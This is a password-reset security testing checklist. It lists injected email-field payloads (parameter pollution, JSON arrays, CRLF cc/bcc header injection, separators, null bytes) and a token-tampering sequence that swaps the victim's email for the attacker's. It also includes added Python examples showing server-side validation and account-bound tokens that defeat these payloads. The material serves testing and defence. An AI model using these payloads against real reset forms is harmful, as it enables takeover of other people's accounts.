Reset Password

Password Reset Security testing Checklist

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
# no domain
email=victim

# no TLD (top-level domain)
email=victim@xyz

# change param case
email=victim@mail.com&Email=attacker@mail.com

# other separators and injected characters
email@email.com,victim@hack.secry
email@email,victim@hack.secry
email@email.com:victim@hack.secry
email@email.com%0d%0avictim@hack.secry
%0d%0avictim@hack.secry
%0avictim@hack.secry
victim@hack.secry%0d%0a
victim@hack.secry%0a
victim@hack.secry%0d
victim@hack.secry%00
victim@hack.secry{{}}
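As an added example that is not part of this checklist, the following Python function shows the server-side handling that makes every payload above fail: it reads the recipient from a form-encoded or JSON reset request, refuses the request unless exactly one `email` field (in any letter case) is present exactly once and is a plain string, and then requires a single well-formed address with a domain and TLD and none of the CR/LF/NUL, separator or template characters the list injects. The function name `extract_reset_recipient`, the content-type handling and the two regular expressions are assumptions of this example, not the page's code.

```python
import json
import re
from urllib.parse import parse_qs

# Added example (not code from the original page): strict handling of the
# recipient field of a password-reset request. A request is accepted only when
# it names exactly one well-formed address; anything else returns None so the
# caller sends no mail at all.

# One local part, one domain with at least one dot and an alphabetic TLD.
_SINGLE_ADDR = re.compile(
    r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$"
)
# CR, LF, NUL, list separators, whitespace and template braces never belong
# inside one address.
_FORBIDDEN = re.compile(r"[\r\n\x00,;|:{}\s]")


def _email_values_form(body):
    """All values whose key is 'email' in any letter case (catches email= and Email=)."""
    fields = parse_qs(body, keep_blank_values=True)
    values = []
    for key, vals in fields.items():
        if key.lower() == "email":
            values.extend(vals)
    return values


def _email_values_json(body):
    """Same for a JSON object; object_pairs_hook keeps duplicate keys visible."""
    pairs = json.loads(body, object_pairs_hook=lambda p: p)
    values = []
    for key, val in pairs:  # TypeError/ValueError if the top level is not an object
        if isinstance(key, str) and key.lower() == "email":
            values.append(val)
    return values


def extract_reset_recipient(body, content_type):
    """Return the single validated recipient address, or None to refuse the request."""
    try:
        if content_type == "application/json":
            values = _email_values_json(body)
        elif content_type == "application/x-www-form-urlencoded":
            values = _email_values_form(body)
        else:
            return None
    except (ValueError, TypeError):
        return None
    # Exactly one email field, supplied exactly once, as a plain string
    # (rejects parameter pollution, arrays, duplicate keys and case variants).
    if len(values) != 1 or not isinstance(values[0], str):
        return None
    address = values[0]
    # Decoded %0a/%0d/%00/%20 and the literal separators are caught here; the
    # full-match regex then enforces a domain and TLD.
    if _FORBIDDEN.search(address) or not _SINGLE_ADDR.fullmatch(address):
        return None
    return address


if __name__ == "__main__":
    # Constructed sample requests mirroring the checklist entries above.
    for body in ("email=victim@mail.com",
                 "email=victim@mail.com&email=hacker@mail.com",
                 "email=victim@mail.com%0A%0Dcc:hacker@mail.com",
                 "email=victim@xyz"):
        print(repr(body), "->", extract_reset_recipient(body, "application/x-www-form-urlencoded"))
```

The separator check runs on the decoded value, so `%0A%0D`, `%20` and `%00` are rejected for what they become, not for how they were encoded; the form and JSON paths both count fields case-insensitively so that `email` plus `Email` is treated as two recipients rather than one.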
step 1: Attacker enters the victim's email or mobile number into the forgot password field.
step 2: Attacker intercepts the request and sees JSON data like this:

{"email":"victim@gmail.com","token":"1234"}

step 3: Attacker changes the victim's email to his own email address

{"email":"attacker@gmail.com","token":"1234"}

and forwards the request.

*Check whether the old token is deactivated or not.
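The three steps above and the final check both come down to how the server ties a reset token to an account. As an added example that is not part of this checklist, the Python class below issues a token that is stored only as a hash against the account it was requested for, so a token submitted with a different email is refused; issuing a new token replaces the previous one, so the old token is deactivated; and a successful redemption consumes the token. The class name `ResetTokenStore`, the in-memory dictionary standing in for a database table, and the 15-minute lifetime are assumptions of this example.

```python
import hashlib
import hmac
import secrets
import time

# Added example (not code from the original page): a reset token bound to the
# account it was issued for, single-use, time-limited, and superseded by any
# later token for the same account.

TOKEN_TTL_SECONDS = 15 * 60  # assumed lifetime


class ResetTokenStore:
    def __init__(self, now=time.time):
        self._now = now
        # account email -> (sha256 of the live token, issue time); stand-in for a DB table
        self._by_account = {}

    @staticmethod
    def _hash(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, account_email):
        """Create a fresh token; any earlier token for this account stops working."""
        token = secrets.token_urlsafe(32)
        self._by_account[account_email] = (self._hash(token), self._now())
        return token  # sent only to the account's verified address

    def redeem(self, submitted_email, token):
        """True only if token is the live token of submitted_email; consumes it."""
        record = self._by_account.get(submitted_email)
        if record is None:
            return False  # no live token for this account (e.g. email swapped in step 3)
        token_hash, issued_at = record
        if self._now() - issued_at > TOKEN_TTL_SECONDS:
            del self._by_account[submitted_email]
            return False
        if not hmac.compare_digest(token_hash, self._hash(token)):
            return False
        del self._by_account[submitted_email]  # single use
        return True


if __name__ == "__main__":
    store = ResetTokenStore()
    first = store.issue("victim@gmail.com")
    print("token with swapped email accepted:", store.redeem("attacker@gmail.com", first))
    second = store.issue("victim@gmail.com")
    print("old token still valid after reissue:", store.redeem("victim@gmail.com", first))
    print("current token accepted:", store.redeem("victim@gmail.com", second))
    print("current token reusable:", store.redeem("victim@gmail.com", second))
```

Looking the token up by the submitted account rather than by the token value alone is what defeats step 3: the record is keyed by the address the token was issued for, so the attacker's address finds nothing, and the token itself never identifies an account on its own.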
